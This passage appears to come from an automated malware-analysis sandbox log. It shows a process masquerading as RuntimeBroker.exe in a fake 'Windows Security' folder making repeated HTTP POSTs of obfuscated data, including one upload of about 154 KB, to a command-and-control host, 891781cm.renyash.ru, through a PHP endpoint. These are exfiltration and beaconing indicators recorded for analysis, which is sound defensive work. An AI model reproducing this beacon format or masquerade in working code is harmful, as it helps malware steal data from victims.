                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf621dd86515bb-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3284&min_rtt=1720&rtt_var=3773&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1376&delivery_rate=102571&cwnd=112&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.449735104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:09.556725979 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:22:09.923898935 CET1056OUTData Raw: 50 53 5d 56 5a 57 54 5a 55 5a 54 59 51 5d 55 5c 58 5d 5c 5f 59 57 52 5c 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PS]VZWTZUZTYQ]U\X]\_YWR\][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ]+54+%_&>=[=>?_'$1-(3)'Z'8$_?.<V)#^!'^)?
                                                                                                                          Jan 1, 2025 04:22:10.233733892 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:10.251768112 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:10.319259882 CET804INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:10 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LHk2paHzPUNVIbSTbUIlGZVX7VhiD9tkCXrITP0XHkljSadiOgCcW9LMN5tmr%2FKUiP2dbPkOsTt2Z8rn59jbZdVSRoTtWRz9bM4dFtJ50JgMKYQA7JOw3UrT%2FuDKSAleD1xln%2FiG"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62246a6941a1-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3829&min_rtt=2242&rtt_var=4016&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1376&delivery_rate=97698&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.449737104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:10.511476040 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.449738104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:10.735229969 CET346OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 154164
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:11.084399939 CET12360OUTData Raw: 55 56 58 52 5a 5a 54 58 55 5a 54 59 51 52 55 56 58 53 5c 54 59 54 52 5d 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UVXRZZTXUZTYQRUVXS\TYTR]][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ Y<,2!+&)>($%:$_$)$<3Z-> _+$><#^!'^)
                                                                                                                          Jan 1, 2025 04:22:11.089441061 CET12360OUTData Raw: 08 3a 1f 05 21 1c 02 09 27 0c 5c 52 01 2a 1a 22 08 3e 1b 27 38 02 5e 33 3c 05 3a 1d 39 5b 22 2d 31 0e 05 57 21 5b 05 56 24 58 09 1c 33 05 58 0f 37 06 29 3d 3d 33 3f 12 38 50 3e 53 0e 28 24 24 39 5e 0c 20 3b 24 2d 17 24 5b 0d 58 34 22 3f 41 27 04
                                                                                                                          Data Ascii: :!'\R*">'8^3<:9["-1W![V$X3X7)==3?8P>S($$9^ ;$-$[X4"?A'23Z8)T$>-.5,3[V:[<?X?83/>(2<49:!2&34-1U9?9,> %7X;&?S89"Q=437'#<* 1/Z&#V:*T=T?]8(/1"7X0S9,X$"^"^+<:><!2X=!50<^=:3*
                                                                                                                          Jan 1, 2025 04:22:11.089508057 CET4944OUTData Raw: 0a 22 3f 00 02 32 1e 20 3d 58 07 3b 2b 58 20 57 21 09 2a 01 0f 2f 1f 3e 2d 37 28 38 01 3c 29 2f 11 05 3c 58 27 11 23 1e 3b 2d 3b 20 07 58 31 12 3b 5e 3a 3c 32 58 41 33 05 2c 09 59 26 26 0f 0f 06 27 1d 3a 30 33 36 55 22 58 24 06 36 00 05 5e 21 58
                                                                                                                          Data Ascii: "?2 =X;+X W!*/>-7(8<)/<X'#;-; X1;^:<2XA3,Y&&':036U"X$6^!X@17<Z"Q%%$:+:>#X)$S""U5]4<';S]3,:'%18>49[?0X>&019=4Y920-:2TP_;87\<?,Z>2?>/?7+%Z/>U>=2W6;'04>T:)7Y'Q"
                                                                                                                          Jan 1, 2025 04:22:11.089550972 CET4944OUTData Raw: 26 3d 1d 1e 29 29 06 5d 05 1b 32 18 3f 24 5e 1f 03 39 0a 01 21 1e 22 1a 33 1f 2c 07 27 21 0b 16 34 56 03 10 30 01 12 22 31 07 32 1f 01 2e 2f 12 25 3f 0b 3e 3d 09 05 3f 3f 58 1c 15 2c 5e 01 22 22 01 30 29 31 3b 2a 5f 20 0e 31 19 3e 0f 25 07 37 0f
                                                                                                                          Data Ascii: &=))]2?$^9!"3,'!4V0"12./%?>=??X,^""0)1;*_ 1>%7?:"\3[Y*T6?Q=2_=!!8SQ?V<<XQ#=1'?),1220$Z9Y4<0*<6/?8762+,:Q==P<-0C'!Y6,3U&WR1140(<1!$1',3&>;<.2&8>?8Y)]54;9&@
                                                                                                                          Jan 1, 2025 04:22:11.089576006 CET2472OUTData Raw: 04 21 00 3c 14 39 29 1f 32 3d 3a 5a 04 23 2c 5c 3a 08 5e 5c 3d 1c 33 1c 3d 5a 21 39 38 20 28 08 3e 3f 0a 1c 29 5c 38 5c 0a 21 07 12 25 58 2d 54 25 06 5a 27 26 3c 22 11 05 30 55 15 0d 05 02 50 08 3f 3f 13 24 04 01 0e 23 16 35 0b 01 06 5c 1c 0f 37
                                                                                                                          Data Ascii: !<9)2=:Z#,\:^\=3=Z!98 (>?)\8\!%X-T%Z'&<"0UP??$#5\70;[85*67</P7^"-.\1>8%2%@;Z&0.Y=*<$,;=8298"=8?"=X0!0%%X#8#Q%X,5/=#0680->!X7&(302:4:)5W!''70X.Z("=9' 82X>')0\
                                                                                                                          Jan 1, 2025 04:22:11.094369888 CET2472OUTData Raw: 0b 2d 1e 38 3b 3f 09 2b 17 01 1a 53 05 04 1a 11 32 1d 3d 1f 37 41 1a 3d 35 28 02 02 3d 3c 3a 3a 2b 41 3b 1d 3f 20 31 1e 02 32 3e 57 24 37 30 19 2d 5a 57 58 37 3f 2c 1c 3a 5a 25 5b 3f 22 27 59 38 32 3a 39 01 16 0e 5d 28 5d 12 27 09 02 14 1e 3d 30
                                                                                                                          Data Ascii: -8;?+S2=7A=5(=<::+A;? 12>W$70-ZWX7?,:Z%[?"'Y82:9](]'=0)$""Z">__316V:Q('?\%Z ,5'+3+^8?;>=&!#>Z=$T;;33;.(9+R1(P5S=+8!]?4=/=$ <#$=-'1%$'U&<[8$$6>-X=_>70X_*"<:)$2&$=9
                                                                                                                          Jan 1, 2025 04:22:11.094490051 CET7416OUTData Raw: 0d 52 25 17 0f 00 0e 18 22 5c 03 1e 0e 40 5f 51 38 3d 2b 27 35 21 2b 40 26 5b 07 25 06 3e 30 32 12 31 14 45 3e 07 0b 0b 31 42 3f 5b 2e 58 36 11 24 58 33 13 0d 01 37 25 24 2f 33 1e 30 07 0f 11 3f 5c 03 19 25 3d 36 19 33 2e 24 59 3f 34 03 53 06 27
                                                                                                                          Data Ascii: R%"\@_Q8=+'5!+@&[%>021E>1B?[.X6$X37%$/30?\%=63.$Y?4S'?.P00"U1+(;6=4:,0.2%+Z8)":8:71:(S:X!#$</=$"14<"*[? %;!&Y;":Y%8X5+$?$'?": 28#7+*Y0=-?=%-:2WT=<-[/
                                                                                                                          Jan 1, 2025 04:22:11.094537973 CET4944OUTData Raw: 3d 5d 29 16 2f 5b 23 11 0f 19 2a 34 30 04 3c 0b 35 39 3a 5b 3a 24 07 25 0b 06 15 2f 00 0b 28 23 27 04 03 21 04 3e 28 2b 26 23 14 36 27 3f 1f 32 2d 37 53 1c 04 2f 35 27 13 2e 3b 04 3a 59 06 5c 0a 10 27 3b 02 23 31 11 34 5c 04 5b 25 2c 3a 1e 33 5b
                                                                                                                          Data Ascii: =])/[#*40<59:[:$%/(#'!>(+&#6'?2-7S/5'.;:Y\';#14\[%,:3[3X>%9/2%8=,"/X''"U68/[=6:7'-:*=38*C,]1V+2::&49^\ZY8<,[-P+%_9Z&?2-U6;!\Z;/%\B?$YZ8 $34_23-*U4!/:P.%)
                                                                                                                          Jan 1, 2025 04:22:11.133418083 CET42024OUTData Raw: 31 07 30 1a 3b 40 13 2e 34 27 15 35 3b 38 14 1c 3c 30 2c 5e 31 01 1d 1e 28 3c 2b 2c 31 27 33 5d 03 1a 18 19 3d 1c 5a 1b 36 02 3f 19 24 0a 04 22 3d 1c 3c 01 27 0e 35 1a 3f 55 1b 04 24 37 12 34 3f 00 2d 2a 35 00 28 36 3d 07 1f 24 3e 1e 27 18 08 2e
                                                                                                                          Data Ascii: 10;@.4'5;8<0,^1(<+,1'3]=Z6?$"=<'5?U$74?-*5(6=$>'. 2*/?(_$6?=&U16-$)*62)V\>ZX?@?#=1%;9",6X26.8!)!?"/%8001=Y8,<;+1"=<;=:/*(:"ZU^!,*%1&<Y$42Y,8(V",./?Q
                                                                                                                          Jan 1, 2025 04:22:11.138356924 CET4944OUTData Raw: 35 5e 30 19 3d 32 3e 03 06 37 1a 39 27 08 29 22 30 0b 3d 12 38 02 24 38 07 58 52 1e 00 23 24 21 3f 11 21 35 25 22 02 5e 3e 2d 25 1e 2d 15 5c 58 22 2b 3c 28 25 5c 14 5d 3a 56 17 26 3e 20 5e 07 3b 33 39 58 3c 14 03 19 36 5b 59 3c 05 2e 3f 3e 0d 1a
                                                                                                                          Data Ascii: 5^0=2>79')"0=8$8XR#$!?!5%"^>-%-\X"+<(%\]:V&> ^;39X<6[Y<.?>W;??;*R-![$ <0],&:-1T )2#>W:5 8",;S;>,"X3)4->=?"67Q\,.$^.$#(:P7A*-\ ?,"0-5A<7>=1)[/>/_?/ Y0#"";9*Y8=[,X#&-7-A'>,R2:Z<3=](?
                                                                                                                          Jan 1, 2025 04:22:11.224057913 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:12.208709002 CET803INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:12 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jdkerrcsRAAmezEiHdmlxumNZfEyMUB3wc6E1GLk27USLdfPM8wdpnxeUMEmRaP8urN0Yh3AwtZgXbVhu4k9HYYFNQEIYr5kudIODKFIjxDMB3DcquNdjbQ1rPGwUcq4sCEmOYb0"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf622bdc354294-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4377&min_rtt=1728&rtt_var=5947&sent=54&recv=157&lost=0&retrans=0&sent_bytes=25&recv_bytes=154510&delivery_rate=63680&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.449739104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:10.915914059 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:11.271787882 CET1056OUTData Raw: 50 54 58 5c 5f 59 51 5f 55 5a 54 59 51 59 55 5c 58 5e 5c 59 59 53 52 5c 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PTX\_YQ_UZTYQYU\X^\YYSR\][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#+ =2X%> $V. ^'-3[8>8+> *#^!'^)/
                                                                                                                          Jan 1, 2025 04:22:11.413983107 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:11.678848028 CET817INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:11 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X%2BnkiTyqQu6Buvo%2BmyqI%2FycbOjuoD30thl6cde%2FkYq3ZWAwKq1rprum9dXquX6Q7x6x%2BcUUO5wc3kF%2FPctX5tKVy5rpI%2B3TImF3TrK9%2FZzdYmv193ma8PuneloEDe91sMy4fgoBl"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf622d1fa1726f-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=21634&min_rtt=17333&rtt_var=15102&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=28216&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.449740104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:11.811580896 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:22:12.162347078 CET1056OUTData Raw: 55 53 58 57 5f 5b 51 5e 55 5a 54 59 51 58 55 54 58 5a 5c 5c 59 50 52 5f 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: USXW_[Q^UZTYQXUTXZ\\YPR_][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ^</> ;*&6>$49,4'3*&/ 8=8+$V*,#^!'^)+
                                                                                                                          Jan 1, 2025 04:22:12.260154009 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:12.518620014 CET802INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:12 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vz96Z1QUQGhJgjUozwTCPaNjqz5SA%2FRFzSD5JH3gq0o3WFU6oC%2FPVzyDzvJncxpyJZs7a0UQ3WzcGwOQQQLx5TsnAhyJcGJUUNLQgMe30hqxJNlmd8Ni1SX4yKfTiTS8hx65M3YW"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62325cf28c71-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4169&min_rtt=2065&rtt_var=4983&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1376&delivery_rate=77252&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.449742104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:12.795783043 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1048
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:22:13.146776915 CET1048OUTData Raw: 55 57 5d 54 5a 5a 54 58 55 5a 54 59 51 5b 55 50 58 53 5c 5d 59 52 52 58 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UW]TZZTXUZTYQ[UPXS\]YRRX][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#+?79Z$-!\=.Y34P.4'!$?;8.7(=(S=#^!'^)3
                                                                                                                          Jan 1, 2025 04:22:13.344894886 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:13.499562979 CET804INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:13 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H4TcU3X16tO1k5FFvD7RqtXztGLcodzWbj%2FTVgZ08KeZXBoalamSWzDqa4q7TN222x1ZIbsTmuoCqh8X3BY%2B24DiTHLp%2FDt7kLavoS5WDmr5j4LGPC0bCbgAySXGdwRCtRzsMzfw"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf6238793c0fa8-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3821&min_rtt=1545&rtt_var=5133&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1368&delivery_rate=73890&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.2.449744104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:13.634984016 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.449746104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:13.781091928 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1780
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:14.131011963 CET1780OUTData Raw: 50 55 5d 53 5a 5f 51 5e 55 5a 54 59 51 58 55 5c 58 5e 5c 5f 59 56 52 5f 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PU]SZ_Q^UZTYQXU\X^\_YVR_][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#)/=Y72&>Y*-(0$97(^$"T$,_,=([?>$>#^!'^)+
                                                                                                                          Jan 1, 2025 04:22:14.251899958 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:14.530011892 CET951INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:14 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TEj6BHyQBL8Dr9NAGHVFX9atLpsk86iqptRAFqar%2FVw304opjEsnZeenMDgrSJUHfmylmGG42ICOYyUMypsX01ALJM225CCzupB7Q5ZaW9lcLr%2Fjaz5kW95oir8600Yt0E3gkI0W"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf623ecaa718ee-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3254&min_rtt=1452&rtt_var=4150&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2124&delivery_rate=91974&cwnd=143&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 22 1c 24 5d 2c 06 29 3e 0c 5b 2d 3c 3f 1c 25 2c 21 06 33 1e 24 59 31 2e 39 14 3a 2b 2c 59 2b 28 20 07 26 3a 32 07 20 21 2d 01 24 26 2e 5d 04 1d 25 1e 3f 3a 26 59 2a 3c 32 03 3d 32 2b 04 27 27 2b 10 24 24 02 5a 27 2d 26 1f 35 32 0e 0e 25 33 3b 0e 2b 2a 38 06 24 2e 22 54 20 2a 2e 57 0d 12 21 0d 32 3d 3e 0e 3e 0f 20 53 36 12 0e 0b 27 3c 2f 1d 24 3f 3b 09 20 2b 36 52 3e 3c 20 1f 21 37 21 54 33 3a 02 02 22 17 0c 01 36 33 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98"$],)>[-<?%,!3$Y1.9:+,Y+( &:2 !-$&.]%?:&Y*<2=2+''+$$Z'-&52%3;+*8$."T *.W!2=>> S6'</$?; +6R>< !7!T3:"63"T /T=VO0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
